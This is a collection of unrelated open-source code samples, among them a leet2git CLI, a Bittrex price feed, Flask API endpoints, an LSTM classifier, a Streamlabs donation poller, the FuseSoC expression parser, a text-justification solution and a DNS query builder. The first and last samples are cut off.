    "--source-repository", "-s", default="", help="the path to the folder where the code will be saved"
)
@click.option("--language", "-l", default="python3", help="the default language")
@click.option("--create-repo", "-c", is_flag=True, help="generates a git repository")
@click.pass_obj
def init(cm: ConfigManager, source_repository: str, language: str, create_repo: bool):
    """Creates a new configuration file and can generate a git repository.
    \f
    Args:
        source_repository (str, optional): the path to the folder where the code will be saved.
            Defaults to "".
        language (str, optional): the default language. Defaults to "python3".
        create_repo (bool, optional): generates a git repository. Defaults to False.
    """
    # load_old=False: start from a fresh config rather than merging.
    reset_config(cm, source_repository, language, load_old=False)
    cm.load_config()
    if create_repo:
        data = QuestionData(language=cm.config["language"])
        file_handler = create_file_handler(data, cm.config)
        file_handler.generate_repo(cm.config["source_path"])
@leet2git.command()
@click.option(
    "--source-repository", "-s", default="", help="the path to the folder where the code will be saved"
)
@click.option("--language", "-l", default="python3", help="the default language")
@click.option(
    "--soft/--hard",
    default=True,
    help="A soft reset only erases the database. A hard reset also erase the files.",
)
@click.pass_obj
def reset(cm: ConfigManager, source_repository: str, language: str, soft: bool):
    """Reset the configuration file
    \f
    Args:
        source_repository (str, optional): the path to the folder where the code will be saved.
            Defaults to "".
        language (str, optional): the default language. Defaults to "python3".
        soft(bool, optional): the reset hardness. Defaults to soft.
    """
    if not soft:
        # Hard reset: confirm, then delete every generated solution/test
        # file in the source tree.
        try:
            click.confirm(
                f"This will delete EVERY solution and test file inside \
                the {cm.config['source_path']} folder. \
                Still want to proceed?",
                abort=True,
            )
        except Abort:
            return
        file_list = glob.glob(os.path.join(cm.config["source_path"], "src", "leetcode_*")) + glob.glob(
            os.path.join(cm.config["source_path"], "tests", "test_*")
        )
        for file in file_list:
            try:
                os.remove(file)
            except FileNotFoundError as e:
                click.secho(e.args)
    else:
        # Soft reset: only the question database is wiped.
        try:
            click.confirm("This will delete the question database. Still want to proceed?", abort=True)
        except Abort:
            return
    reset_config(cm, source_repository, language)
    cm.load_config()
    qdb = QuestionDB(cm.config)
    qdb.reset()
    if not soft:
        # Recreate an empty repository skeleton after a hard reset.
        data = QuestionData(language=cm.config["language"])
        file_handler = create_file_handler(data, cm.config)
        file_handler.generate_repo(cm.config["source_path"])
if __name__ == "__main__":
leet2git() # pylint: disable=no-value-for-parameter
| StarcoderdataPython |
1753836 | import requests
from . import FeedSource, _request_headers
class Bittrex(FeedSource):
    """Price feed pulling 24h market summaries from the Bittrex API."""

    def _fetch(self):
        """Return a feed dict with one rate per configured base/quote pair."""
        feed = {}
        url = "https://bittrex.com/api/v1.1/public/getmarketsummaries"
        response = requests.get(url=url, headers=_request_headers, timeout=self.timeout)
        result = response.json()["result"]
        # Keep the raw payload around for debugging/auditing.
        feed["response"] = response.json()
        for thisMarket in result:
            for base in self.bases:
                for quote in self.quotes:
                    if quote == base:
                        continue
                    # Bittrex names markets "BASE-QUOTE".
                    if thisMarket["MarketName"] == base + "-" + quote:
                        self.add_rate(feed, base, quote, float(thisMarket["Last"]), float(thisMarket["Volume"]))
        return feed
| StarcoderdataPython |
12842869 | from abc import ABCMeta, abstractmethod
class AbstractTransformation(metaclass=ABCMeta):
    """Interface for image/position transformations.

    BUGFIX: the original declared ``__metaclass__ = ABCMeta``, which is
    the Python 2 spelling and has no effect under Python 3 -- the
    abstract methods were silently unenforced.  Declaring the metaclass
    with ``metaclass=ABCMeta`` makes instantiating this class (or an
    incomplete subclass) raise ``TypeError`` as intended.
    """

    @abstractmethod
    def transform_image(self, image):
        """Return a transformed version of *image*."""

    @abstractmethod
    def transform_position(self, x, y, width, height):
        """Map the rectangle (x, y, width, height) through the transformation."""

    @abstractmethod
    def generate_random(self):
        """Randomise the transformation's parameters."""
| StarcoderdataPython |
3488975 | <filename>api/endpoints/projects/topicProject.py
from flask import Blueprint, jsonify, request
from models.models import (
db,
TopicModel,
ProjectModel,
RelProjectTopic,
)
topicProject_api = Blueprint("topicProject_api", __name__)
@topicProject_api.route("/addProjectTopic", methods=("POST",))
def addProjectTopic():
body = request.get_json()
topic = str(body["topic"])
projectId = str(body["projectId"])
error = None
if not topic or not projectId:
error = "Missing Data"
if TopicModel.query.filter_by(name=topic).first() is None:
error = f"Topic {topic} does not exist"
if ProjectModel.query.filter_by(id=projectId).first() is None:
error = f"Project with id {projectId} does not exist"
if (
RelProjectTopic.query.filter_by(topic=topic, projectId=projectId).first()
is not None
):
error = f"Topic {topic} already is in the project with id {projectId}"
if error is None:
add_topic = RelProjectTopic(topic, projectId)
db.session.add(add_topic)
db.session.commit()
message = f"Topic {topic} added to the project with id {projectId} successfully"
return jsonify({"status": "ok", "message": message}), 200
else:
return jsonify({"status": "bad", "error": error}), 400
@topicProject_api.route("/getProjectTopics", methods=("POST",))
def getProjectTopics():
body = request.get_json()
projectId = str(body["projectId"])
error = None
if not projectId:
error = "Missing Data"
if error is None:
response = RelProjectTopic.query.filter_by(projectId=projectId).all()
topics = []
for item in response:
topics.append({"topic": item.topic})
return jsonify({"topics": topics}), 200
else:
return jsonify({"status": "bad", "error": error}), 400
@topicProject_api.route("/deleteProjectTopic", methods=("DELETE",))
def deleteProjectTopic():
body = request.get_json()
projectId = str(body["projectId"])
topic = str(body["topic"])
error = None
if not projectId:
error = "Missing Data"
if (
RelProjectTopic.query.filter_by(topic=topic, projectId=projectId).first()
is None
):
error = f"Topic not in project with id {projectId}"
if error is None:
RelProjectTopic.query.filter_by(topic=topic, projectId=projectId).delete()
db.session.commit()
message = f"Topic {topic} removed from the project with id {projectId}"
return jsonify({"status": "ok", "message": message}), 200
else:
return jsonify({"status": "bad", "error": error}), 400
| StarcoderdataPython |
8156959 | <gh_stars>0
from django.apps import AppConfig
class DjangoKmatchConfig(AppConfig):
    """Django application configuration for the ``django_kmatch`` app."""
    name = 'django_kmatch'
    verbose_name = 'Django Kmatch'
| StarcoderdataPython |
1836164 | import json
import argparse
import numpy as np
import tensorflow as tf
import transformers as tm
from load_data import *
def build_clf_model(vocab_size, params):
    """Build the stateful LSTM backbone used for language modelling.

    Embedding -> N stateful LSTM layers -> logits over the vocabulary.
    The binary emotion head is appended separately by the caller when
    fine-tuning for classification.

    Args:
        vocab_size: number of tokens in the vocabulary.
        params: dict providing "embed", "batch", "layers", "hidden", "drop".
    """
    # Build a stateful LSTM for the language-modelling task.
    model = tf.keras.Sequential()
    model.add(tf.keras.layers.Embedding(vocab_size, params["embed"], batch_input_shape=[params["batch"], None]))
    # At least one LSTM layer is always created, even if params["layers"] < 1.
    for i in range(max(1, params["layers"])):
        model.add(tf.keras.layers.LSTM(params["hidden"], return_sequences=True, stateful=True, dropout=params["drop"]))
    model.add(tf.keras.layers.Dense(vocab_size))
    return model
def train_clf_model(model, params, train_dataset, test_dataset):
    """Compile and train the classifier, checkpointing the best weights.

    Args:
        model: the tf.keras model to train (built by ``build_clf_model``).
        params: training-parameter dict; uses "lr", "dimension", "epochs".
        train_dataset: tf.data dataset of training batches.
        test_dataset: tf.data dataset used for validation.

    Returns:
        The Keras ``History`` object produced by ``fit``.
    """
    model.compile(loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
                  optimizer=tf.keras.optimizers.Adam(params["lr"]), metrics=['accuracy'])

    # Save only the best weights (by validation accuracy) per run.
    checkpoint = tf.keras.callbacks.ModelCheckpoint(
        '../../trained/clf_lstm.ckpt/clf_lstm' + "_" + str(params["dimension"]) + "/clf_lstm",
        monitor='val_accuracy', verbose=1, save_best_only=True, save_weights_only=True)

    # BUGFIX: train the ``model`` argument instead of the global
    # ``clf_lstm``, which only happened to exist when run as a script.
    history = model.fit(train_dataset, epochs=params["epochs"],
                        validation_data=test_dataset, callbacks=[checkpoint])
    return history
if __name__ == "__main__":
# Parse arguments
parser = argparse.ArgumentParser(description='clf_lstm.py')
parser.add_argument('--conf', type=str, required=True, help="JSON file with training parameters.")
opt = parser.parse_args()
# Load training parameters
params = {}
with open(opt.conf) as conf_file:
params = json.load(conf_file)["clf_lstm"]
# Load char2idx dict from json file
with open(params["vocab"]) as f:
vocab = json.load(f)
# Build dataset from encoded unlabelled midis
train_dataset = load_dataset(params["train"], vocab, params["dimension"])
test_dataset = load_dataset(params["test"], vocab, params["dimension"])
train_dataset = build_dataset(train_dataset, params["batch"])
test_dataset = build_dataset(test_dataset, params["batch"])
# Calculate vocab_size from char2idx dict
vocab_size = len(vocab)
# Rebuild generative model from checkpoint
clf_lstm = build_clf_model(vocab_size, params)
if params["finetune"]:
ckpt = tf.train.Checkpoint(net=clf_lstm)
ckpt.restore(tf.train.latest_checkpoint(params["pretr"]))
# Add emotion head
clf_lstm.add(tf.keras.layers.Dense(1, name="emotion_head"))
# Train lstm
train_clf_model(clf_lstm, params, train_dataset, test_dataset)
| StarcoderdataPython |
5046346 | <reponame>lht19900714/Leetcode_Python<filename>Algorithms/0119_Pascal's_Triangle_II/Python/Pascal's_Triangle_II_Solution_1.py
# Space: O(n)
# Time: O(n^2)
# same approach as solution 1, compress space from n^2 to n
class Solution:
    def getRow(self, rowIndex):
        """Return row ``rowIndex`` (0-indexed) of Pascal's triangle.

        Improvement over the original: the row is updated in place from
        right to left, so each cell still reads the previous row's
        values -- this drops the per-row ``temp = data[:]`` copy while
        keeping O(rowIndex) space and O(rowIndex^2) time.
        """
        row = [1] * (rowIndex + 1)
        for i in range(2, rowIndex + 1):
            # Right-to-left so row[j - 1] is still the previous row's value.
            for j in range(i - 1, 0, -1):
                row[j] += row[j - 1]
        return row
| StarcoderdataPython |
5005804 | <gh_stars>0
#!/usr/local/bin/python
#encoding:utf8
import sys, os, datetime, time, pty, pprint, shutil, re
sys.path.insert(0, "..")
from fabric.api import(
run, env, prompt, put, cd
)
from fabric.contrib.files import (
exists as fab_exists,
append as fab_append,
)
from fabric.context_managers import (
prefix
)
def setup(setting):
    """Placeholder fabric task intended to provision a host from `setting`.

    NOTE(review): currently a no-op -- confirm whether it is still needed.
    """
    pass
| StarcoderdataPython |
8045148 | <filename>streamlabs/streamlabsrun.py
import requests
from config import STREAMLABS_SECRET, STREAMLABS_ID, STREAMLABS_REDIRECT
from decimal import Decimal
import pprint
import os
import json
import time
def streamlabs_handler(q_twitchbeagle, q_gpio):
    """Poll the Streamlabs API forever, pushing new donations onto queues.

    Each iteration refreshes the OAuth tokens (persisted in the
    'slaccesstoken'/'slrefreshtoken' files), fetches the most recent
    donation and, when its id differs from the one stored in
    'streamlabs_latest_donation', emits an 'electrical' event and a chat
    message event on q_twitchbeagle.

    NOTE(review): q_gpio is currently unused -- confirm whether it is needed.
    This is Python 2 code (see the except clause at the bottom).
    """
    #Grab streamlabs tokens
    headers = []
    while True:
        try:
            # Load the persisted OAuth tokens from disk.
            with open('slrefreshtoken', 'r') as f:
                r_token = f.read()
            with open('slaccesstoken', 'r') as f:
                a_token = f.read()
            token_call = {
                'grant_type' : 'refresh_token',
                'client_id' : STREAMLABS_ID,
                'client_secret' : STREAMLABS_SECRET,
                'redirect_uri' : STREAMLABS_REDIRECT,
                'refresh_token' : r_token
            }
            donations_params = {
                'access_token' : a_token,
                'limit' : 1,
                'currency' : "USD"
            }
            # Throttle polling to one request every 10 seconds.
            time.sleep(10)
            r = requests.post(
                'https://streamlabs.com/api/v1.0/token',
                data = token_call,
                headers = headers
            )
            # Persist the rotated tokens so the next iteration can use them.
            a_token = r.json()['access_token']
            r_token = r.json()['refresh_token']
            with open('slaccesstoken', 'w') as f:
                f.write(a_token)
            donations_params['access_token'] = a_token
            with open('slrefreshtoken', 'w') as f:
                f.write(r_token)
            donationsurl = "https://streamlabs.com/api/v1.0/donations"
            donate = requests.get(
                donationsurl,
                headers = headers,
                params = donations_params
            )
            #usd_two_places = float(format(usd_value, '.2f')))
            donationinfo = donate.json()['data'][0]
            #print('amount', donationinfo['amount'])
            #print('donor', donationinfo['name'])
            #print('message', donationinfo['message'])
            with open("streamlabs_latest_donation", 'r') as f:
                latestdonation = int(f.read())
            # Only react when the newest donation id differs from the stored
            # one.  NOTE(review): latestdonation is an int while the API id
            # may be a string -- confirm the comparison types match.
            if latestdonation != donationinfo['donation_id']:
                queueEvent = {
                    'eventType' : 'electrical',
                    'event' : 'bits'
                }
                q_twitchbeagle.put(queueEvent)
                # Quantize the amount to exactly two decimal places.
                TWOPLACES = Decimal(10) ** -2
                queueEvent = {
                    'eventType' : 'twitchchatbot',
                    'event' : 'Donation from %s for $%s.' % (
                        donationinfo['name'],
                        Decimal(donationinfo['amount']).\
                        quantize(TWOPLACES))
                }
                q_twitchbeagle.put(queueEvent)
                # Remember this donation id so it is not announced again.
                with open("streamlabs_latest_donation", 'w') as f:
                    print(donationinfo['donation_id'])
                    print("WE ARE WRITING TO THE FILE")
                    f.write(str(donationinfo['donation_id']))
                    print("WE HAVE WRITTEN TO THE FILE")
        except Exception,e:
            # Best-effort loop (Python 2 syntax): log the error, keep polling.
            print e
            pass
| StarcoderdataPython |
6471510 | import numpy as np
from ptools.R4C.policy_gradients.actor_critic_shared.ac_shared_model import ACSharedModel
from ptools.R4C.trainer import FATrainer
class ACSharedTrainer(FATrainer):
    """Trainer for a policy-gradient model with shared actor/critic parameters."""
    def __init__(
            self,
            acs_model: ACSharedModel,
            verb= 1,
            **kwargs):
        """Wrap FATrainer, registering the shared actor-critic model as the actor."""
        FATrainer.__init__(self, actor=acs_model, verb=verb, **kwargs)
        self.actor = acs_model # INFO: type "upgrade" for pycharm editor
        self.num_of_actions = self.envy.num_actions()
        if self.verb>0:
            print(f'\n*** ACTrainer for {self.envy.name} initialized')
            print(f' > actions: {self.envy.num_actions()}, exploration: {self.exploration}')
    # update is performed for both: Actor and Critic
    def update_actor(self, inspect=False):
        """Run one batched update of the shared actor-critic from replay memory.

        Pulls the entire memory, z-score normalizes the discounted returns,
        updates the model, clears the memory and returns the training loss.
        Set inspect=True to print batch shapes and first elements.
        """
        batch = self.memory.get_all()
        observations = self._extract_from_batch(batch, 'observation')
        actions = self._extract_from_batch(batch, 'action')
        #rewards = self._extract_from_batch(batch, 'reward')
        dreturns = self._extract_from_batch(batch, 'dreturn')
        next_observations = self._extract_from_batch(batch, 'next_observation')
        terminals = self._extract_from_batch(batch, 'game_over')
        if inspect:
            # Debug dump of batch contents.
            print(f'\nBatch size: {len(batch)}')
            print(f'observations: {observations.shape}, {observations[0]}')
            print(f'actions: {actions.shape}, {actions[0]}')
            #print(f'rewards {rewards.shape}, {rewards[0]}')
            print(f'next_observations {next_observations.shape}, {next_observations[0]}')
            print(f'terminals {terminals.shape}, {terminals[0]}')
        # Normalize returns (zero mean / unit variance) for stabler gradients.
        dreturns_norm = self.zscore_norm(dreturns)
        loss = self.actor.update_batch(
            observations= observations,
            actions= actions,
            #rewards= rewards,
            dreturns= dreturns_norm,
            next_observations= next_observations,
            terminals= terminals,
            discount= self.discount)
        self.memory.reset()
        return loss
1651508 | from enum import Enum, unique
@unique
class Game(str, Enum):
    """Halo game identifiers as they appear in the API (string-valued enum)."""
    ALL = "All"
    HALO_CE = "HaloCombatEvolved"
    HALO_2 = "Halo2"
    HALO_2_ANNIVERSARY = "Halo2Anniversary"
    HALO_3 = "Halo3"
    HALO_4 = "Halo4"
    HALO_REACH = "HaloReach"
1765839 | <gh_stars>0
from app import app
import urllib.request,json
from .models import source,article
Source = source.Source
Article = article.Article
# Getting api key
api_key = app.config['NEWS_API_KEY']
base_url = app.config["SOURCE_API_BASE_URL"]
articles_url = app.config["ARTICLE_API_BASE_URL"]
def get_sources(category):
    '''
    Fetch news sources for `category` from the API and return them as a list
    of Source objects, or None when the response contains no sources.

    Args:
        category: category name interpolated into SOURCE_API_BASE_URL.
    '''
    get_sources_url = base_url.format(category,api_key)
    with urllib.request.urlopen(get_sources_url) as url:
        get_sources_data = url.read()
        get_sources_response = json.loads(get_sources_data)
        source_results = None
        # NOTE(review): a response without a 'sources' key raises KeyError.
        if get_sources_response['sources']:
            source_results_list = get_sources_response['sources']
            source_results = process_sources(source_results_list)
    return source_results
def process_sources(source_list):
    '''
    Convert raw source dictionaries from the news API into Source objects.

    Args:
        source_list: list of dicts with source details.
    Returns:
        list of Source objects; entries without a url are skipped.
    '''
    sources = []
    for raw in source_list:
        # A source without a url is unusable downstream -- drop it.
        if not raw.get('url'):
            continue
        sources.append(Source(
            raw.get('id'),
            raw.get('name'),
            raw.get('description'),
            raw.get('url'),
            raw.get('category'),
            raw.get('language'),
            raw.get('country'),
        ))
    return sources
def get_articles(id):
    '''
    Fetch the articles of the news source `id` from the API and return them
    as a list of Article objects, or None when the response has no articles.
    '''
    get_articles_url = articles_url.format(id,api_key)
    with urllib.request.urlopen(get_articles_url) as url:
        get_articles_data = url.read()
        get_articles_response = json.loads(get_articles_data)
        article_results = None
        # NOTE(review): a response without an 'articles' key raises KeyError.
        if get_articles_response['articles']:
            article_results_list = get_articles_response['articles']
            article_results = process_articles(article_results_list)
    return article_results
def process_articles(article_list):
    '''
    Convert raw article dictionaries from the news API into Article objects.

    Args:
        article_list: list of dicts with article details.
    Returns:
        list of Article objects; entries without a url are skipped.
    '''
    articles = []
    for raw in article_list:
        # An article without a url is unusable downstream -- drop it.
        if not raw.get('url'):
            continue
        articles.append(Article(
            raw.get('id'),
            raw.get('name'),
            raw.get('author'),
            raw.get('title'),
            raw.get('description'),
            raw.get('url'),
            raw.get('urlToImage'),
            raw.get('publishedAt'),
            raw.get('content'),
        ))
    return articles
# def get_article(id):
# get_article_details_url = base_url.format(id,api_key)
# with urllib.request.urlopen(get_article_details_url) as url:
# article_details_data = url.read()
# article_details_response = json.loads(article_details_data)
# article_object = None
# if article_details_response:
# id = article_details_response.get('id')
# name = article_details_response.get(' name')
# author = article_details_response.get('author')
# title = article_details_response.get('title')
# description = article_details_response.get('description')
# url = article_details_response.get('url')
# urlToImage = article_details_response.get('urlToImage')
# publishedAt = article_details_response.get('publishedAt')
# content = article_details_response.get('content')
# article_object =Article(id, name,author,description,title,url,urlToImage,publishedAt,content)
# return article_object | StarcoderdataPython |
11270812 | <filename>matplotlib_exercise/interactive/rm_point.py
from matplotlib import pyplot as plt
import numpy as np
LEFT_CLICK = 1
RIGHT_CLICK = 3
class PointRemover:
    """Interactive scatter plot whose points can be removed by right-clicking.

    Keeps the point coordinates in self.xs/self.ys and redraws the artist
    after each removal.
    """
    def __init__(self, pts):
        """Set up the figure and register the pick-event handler.

        Args:
            pts: array-like of points; column 0 is x, column 1 is y.
        """
        pts = np.asarray(pts)
        fig, ax = plt.subplots()
        self.fig = fig
        self.ax = ax
        self.ax.set_xlim([0, 3])
        self.ax.set_ylim([0, 3])
        self.xs = pts[:, 0]
        self.ys = pts[:, 1]
        self.ax.set_title("right click to remove point")
        # register point objects which reacts mouse pick event
        # (picker=5 means a click within 5 points of a marker triggers a pick)
        self.plot_objects, = self.ax.plot(self.xs, self.ys, 'o', picker=5)
        # register event handler
        self.fig.canvas.mpl_connect("pick_event", self.remove_point)
    def remove_point(self, event):
        """
        Remove the picked point nearest to the cursor on a right click,
        then redraw the canvas. Left clicks and picks on other artists
        are ignored.
        """
        if event.mouseevent.button != RIGHT_CLICK:
            return
        if event.artist != self.plot_objects:
            # do nothing
            return
        if not len(event.ind):
            # do nothing
            return
        # find nearest object from position which is mouse clicked
        mouse_x = event.mouseevent.xdata
        mouse_y = event.mouseevent.ydata
        distances = np.hypot(mouse_x - self.xs[event.ind],
                             mouse_y - self.ys[event.ind])
        argmin = distances.argmin()
        remove_index = event.ind[argmin]
        self.xs = np.delete(self.xs, remove_index)
        self.ys = np.delete(self.ys, remove_index)
        self.plot_objects.set_data(self.xs, self.ys)
        self.fig.canvas.draw()
def main():
    """Scatter random points in [0, 3) and launch the interactive remover."""
    pts = 3 * np.random.rand(10, 10)
    # Keep a reference so the instance (and its event handler) stays alive.
    generator = PointRemover(pts)
    plt.show()
if __name__ == '__main__':
main()
| StarcoderdataPython |
12806610 | # Copyright FuseSoC contributors
# Licensed under the 2-Clause BSD License, see LICENSE for details.
# SPDX-License-Identifier: BSD-2-Clause
r"""Support for parsing String expression syntax in core files
FuseSoC core files allow strings matching the following pseudo-BNF:
exprs ::= expr
| expr exprs
expr ::= word
| conditional
word ::= [a-zA-Z0-9:<>.\[\]_-,=~/^]+ (one or more alphanum/special chars)
conditional ::= condition "?" "(" exprs ")"
condition ::= "!" word
| word
A condition of the form "foo ? (bar)" is interpreted as 'if the "foo" flag is
set, then "bar", otherwise nothing'. Similarly, "!foo ? (bar)" is interpreted
as 'if the "foo" flag is not set then "bar", otherwise nothing'.
Expanding some exprs with a set of flags results in a space-separated string
containing each word that matched.
"""
from pyparsing import (
Forward,
OneOrMore,
Optional,
Suppress,
Word,
alphanums,
Group,
ParseException,
)
def _cond_parse_action(string, location, tokens):
    """Pyparsing parse action converting a conditional term into a tuple.

    A conditional term carries 3 tokens when negated ("!", flag, exprs) and
    2 otherwise (flag, exprs); the result is (negated, flag, exprs).
    """
    assert len(tokens) in [2, 3]
    if len(tokens) == 3:
        return (True, tokens[1], tokens[2])
    return (False, tokens[0], tokens[1])
_PARSER = None
def _get_parser():
    """Return a pyparsing parser for the exprs syntax
    This returns a basic "AST" that consists of a list of "exprs". Each expr is
    represented by either a string (if it's just a word) or a tuple of the form
    (negated, flag, exprs).
    Here, negated is a boolean which is true if the condition should be
    negated. flag is a word giving the flag to match for the condition. exprs
    is the AST for the list of exprs inside the parentheses.
    To avoid creating the parser repeatedly, this function is memoized.
    """
    global _PARSER
    if _PARSER is not None:
        return _PARSER
    # Allowed word characters.  NOTE(review): '~' appears twice in this set;
    # harmless, but probably unintentional.
    word = Word(alphanums + ":<>.[]_-,=~/^~")
    # Forward() lets `exprs` reference itself recursively (conditionals
    # contain nested exprs inside their parentheses).
    exprs = Forward()
    conditional = (
        Optional("!")
        + word
        + Suppress("?")
        + Suppress("(")
        + Group(exprs)
        + Suppress(")")
    )
    # '^' is pyparsing's longest-match alternation: prefer a conditional
    # over a bare word when both could match.
    exprs <<= OneOrMore(conditional ^ word)
    conditional.setParseAction(_cond_parse_action)
    _PARSER = exprs
    return _PARSER
def _simplify_ast(raw_ast):
    """Simplify a raw parser AST into plain lists, merging adjacent words.

    Consecutive bare words are joined with a single space ("a", "b" becomes
    "a b"), while conditional tuples (negated, flag, exprs) are kept and
    their sub-expression lists simplified recursively. This makes the common
    words-only case much cheaper to match against flags later.
    """
    simplified = []
    pending_words = []
    for node in raw_ast:
        if isinstance(node, str):
            pending_words.append(node)
        else:
            # Flush the accumulated words before emitting the conditional.
            if pending_words:
                simplified.append(" ".join(pending_words))
                pending_words = []
            negated, flag, sub_exprs = node
            simplified.append((negated, flag, _simplify_ast(sub_exprs)))
    if pending_words:
        simplified.append(" ".join(pending_words))
    return simplified
def _parse(string):
    """Parse a string to a simplified AST.
    Raises a ValueError if the string is malformed in some way.
    """
    try:
        raw_ast = _get_parser().parseString(string, parseAll=True)
    except ParseException as err:
        # 'from None' hides the pyparsing traceback: callers only care about
        # the ValueError with the formatted message.
        raise ValueError(
            "Invalid syntax for string: {}. Parsed text was {!r}.".format(err, string)
        ) from None
    return _simplify_ast(raw_ast)
class Exprs:
    """A parsed list of exprs (see the module docstring for the grammar)."""

    def __init__(self, string):
        self.ast = _parse(string)
        # Fast path: an AST that is a single bare word needs no expansion.
        if len(self.ast) == 1 and isinstance(self.ast[0], str):
            self.as_string = self.ast[0]
        else:
            self.as_string = None

    @staticmethod
    def _expand(ast, flag_defs):
        """Return the (possibly empty) list of words in `ast` whose
        conditions are satisfied by the `flag_defs` set."""
        words = []
        for node in ast:
            if isinstance(node, str):
                words.append(node)
            else:
                negated, flag, sub_ast = node
                # A conditional contributes its contents only when its
                # condition holds (flag present, or absent if negated).
                if (flag in flag_defs) != negated:
                    words.extend(Exprs._expand(sub_ast, flag_defs))
        return words

    @staticmethod
    def _flags_to_flag_defs(flags):
        """Convert a flags dict to the set of defined flag names.

        True values contribute the key itself, string values contribute
        "key_value", and False/None values are dropped.
        """
        defined = set()
        for key, value in flags.items():
            if value is True:
                defined.add(key)
            elif value not in [False, None]:
                defined.add(key + "_" + value)
        return defined

    def expand(self, flags):
        """Expand the parsed string in the presence of the given flags."""
        if self.as_string is not None:
            return self.as_string
        return " ".join(
            Exprs._expand(self.ast, Exprs._flags_to_flag_defs(flags)))
| StarcoderdataPython |
class Solution:
    """LeetCode 68 "Text Justification" (Python 2: relies on integer '/')."""
    def pad_words(self, accumulated, L):
        """Fully justify one line of words to width L.

        Extra spaces are distributed left-to-right: each gap gets the
        remaining padding divided by the remaining gaps, rounded up.
        """
        if len(accumulated) == 1:
            return accumulated[0].ljust(max(len(accumulated[0]), L), ' ')
        raw_size = sum([len(i) for i in accumulated])
        remain_padding_size = L - raw_size
        result = []
        padded_words = 0
        while padded_words < len(accumulated):
            w = accumulated[padded_words]
            # Last word gets no trailing padding on a justified line.
            if len(accumulated) - 1 == padded_words:
                result.append(accumulated[-1])
                break
            # Ceiling division over the remaining gaps (Python 2 int '/').
            if remain_padding_size % (len(accumulated) - padded_words - 1) == 0:
                pad_size = remain_padding_size / (len(accumulated) - padded_words - 1)
            else:
                pad_size = remain_padding_size / (len(accumulated) - padded_words - 1) + 1
            result.append(w.ljust(len(w) + pad_size, ' '))
            remain_padding_size -= pad_size
            padded_words += 1
        return ''.join(result)
    def deal_last_line(self, words, L):
        """Left-justify the final line: single spaces, padded to width L."""
        return ' '.join(words).ljust(L, ' ')
    # @param words, a list of strings
    # @param L, an integer
    # @return a list of strings
    def fullJustify(self, words, L):
        """Greedily pack words into lines of width L and justify each line."""
        if len(words) == 1:
            return [words[0].ljust(max(len(words[0]), L), ' ')]
        accumulated = [words[0]]
        accumulated_size = len(words[0])
        result = []
        lines = []
        for w in words[1:]:
            # A word joins the current line if it fits with one space.
            if accumulated_size + 1 + len(w) <= L:
                accumulated.append(w)
                accumulated_size += 1 + len(w)
            else:
                lines.append(accumulated)
                accumulated = [w]
                accumulated_size = len(w)
        if len(accumulated) > 0:
            lines.append(accumulated)
        i = 0
        while i < len(lines) - 1:
            result.append(self.pad_words(lines[i], L))
            i += 1
        result.append(self.deal_last_line(lines[-1], L))
        return result
s = Solution()
l = ["This", "is", "an", "example", "of", "text", "justification."]
print s.fullJustify(l, 1)
print s.fullJustify(l, 16)
print s.fullJustify([""], 6)
print s.fullJustify([""], 0)
print s.fullJustify(["a", "b", "c", "d", "e"], 3)
print s.fullJustify(["What","must","be","shall","be."], 12)
| StarcoderdataPython |
8082900 | #
# This module holds functions which are used to create our DNS requests.
#
import logging
import math
import random
import struct
logger = logging.getLogger()
#
# A lookup table for our query types.
#
query_types = {
"a": 1,
"ns": 2,
"md": 3,
"mf": 4,
"cname": 5,
"soa": 6,
"mb": 7,
"mg": 8,
"mr": 9,
"null": 10,
"wks": 11,
"ptr": 12,
"hinfo": 13,
"minfo": 14,
"mx": 15,
"txt": 16,
"aaaa": 28,
"axfr": 252,
"mailb": 253,
"maila": 254,
"*": 255,
}
def createHeader(args):
    """createHeader(args): Create a header for our question

    Builds the fixed 12-byte DNS header: request ID, flags (RD set),
    QDCOUNT=1 and zeroed ANCOUNT/NSCOUNT/ARCOUNT.
    An array of bytes is returned.

    args.request_id, when set, is a hex string; otherwise a random 16-bit
    ID is generated.

    Raises:
        Exception: if the parsed request ID does not fit in 16 bits.
    """
    retval = bytes()

    if args.request_id:
        #
        # If the request ID is specified on the command line, parse the hex string.
        #
        request_id = int(args.request_id, 16)
        # Reject anything outside 16 bits (negative values would previously
        # slip through and crash struct.pack further down).
        if not 0 <= request_id <= 65535:
            raise Exception("Request ID of '%s' (%d) is not a valid 16-bit value!" % (
                args.request_id, request_id))
    else:
        request_id = random.randint(0, 65535)

    #
    # The request ID is a single 16-bit big-endian field; pack it directly
    # instead of splitting it into bytes by hand.
    #
    retval += struct.pack(">H", request_id)

    # Flags bytes: [QR|Opcode|AA|TC|RD, RA|Z|RCODE]
    flags = [0, 0]

    #
    # Opcode: 0 = standard query, 1 = inverse query, 2 = server status request
    # (bits 3-6 of the first flags byte)
    #
    opcode = 0
    flags[0] |= (opcode << 3)

    #
    # TODO:
    # - Add support for TC in flags[0]
    #

    # Recursion desired? (bit 0 of the first flags byte)
    rd = 1
    flags[0] |= rd

    #
    # Add in our header
    #
    retval += struct.pack("BB", flags[0], flags[1])

    # QDCOUNT - Number of questions
    qdcount = 1
    retval += struct.pack(">H", qdcount)

    # ANCOUNT - Number of answer
    retval += struct.pack(">H", 0)

    # NSCOUNT - Number of authority records
    retval += struct.pack(">H", 0)

    # ARCOUNT - Number of additional records
    retval += struct.pack(">H", 0)

    return(retval)
def createQuestion(q, query_type):
    """createQuestion(q, query_type): Create the question part of our query

    Encodes the domain name `q` as length-prefixed labels, terminated by a
    zero-length label, followed by the QTYPE and QCLASS (1 = IN) fields.
    An array of bytes is returned.

    Raises:
        Exception: when query_type is not a known type.
    """
    # Resolve the query type up front so an unknown type fails fast.
    if query_type not in query_types:
        raise Exception("Unknown query_type: %s" % query_type)
    qtype = query_types[query_type]

    retval = bytes()

    # QNAME: each dot-separated label becomes <length><bytes>.
    for label in q.split("."):
        retval += struct.pack("B", len(label))
        retval += struct.pack("%ds" % len(label), bytes(label, "utf-8"))

    # Terminate the name with a zero-length label.
    retval += struct.pack("B", 0)

    # QTYPE, then QCLASS (1 = IN).
    retval += struct.pack(">H", qtype)
    retval += struct.pack(">H", 1)

    return(retval)
9692948 | from typing import List
import databases
import pytest
import sqlalchemy
from fastapi import FastAPI
from starlette.testclient import TestClient
import ormar
from tests.settings import DATABASE_URL
app = FastAPI()
metadata = sqlalchemy.MetaData()
database = databases.Database(DATABASE_URL, force_rollback=True)
app.state.database = database
@app.on_event("startup")
async def startup() -> None:
    """Connect the shared database when the app starts (no-op if connected)."""
    database_ = app.state.database
    if not database_.is_connected:
        await database_.connect()
